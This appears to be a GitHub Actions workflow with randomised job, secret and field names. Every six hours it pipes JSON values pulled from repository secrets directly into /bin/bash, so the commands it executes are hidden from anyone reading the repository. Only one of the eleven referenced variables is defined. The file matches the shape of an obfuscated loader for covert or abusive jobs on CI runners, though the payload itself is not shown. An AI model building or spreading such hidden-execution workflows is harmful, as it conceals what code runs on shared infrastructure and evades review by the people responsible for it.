name: lantoufufk

on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lantoufufk
        env:
          dr2250: ${{ secrets.dr2250 }}
        run: |
          echo $dr2250 | jq -r .cmv331 | /bin/bash
          echo $fh4 | jq -r .ei453 | /bin/bash
          echo $up455 | jq -r .rldir7139 | /bin/bash
          echo $kad0 | jq -r .kf78657 | /bin/bash
          echo $dinof1 | jq -r .vivd59 | /bin/bash
          echo $aybk34 | jq -r .wqm266 | /bin/bash
          echo $dwdg04 | jq -r .wgw4047 | /bin/bash
          echo $ttzet251 | jq -r .tc6607 | /bin/bash
          echo $e00361 | jq -r .fdxw0 | /bin/bash
          echo $wcyz203 | jq -r .rtcba6214 | /bin/bash
          echo $dxljk716 | jq -r .ytlc441 | /bin/bash

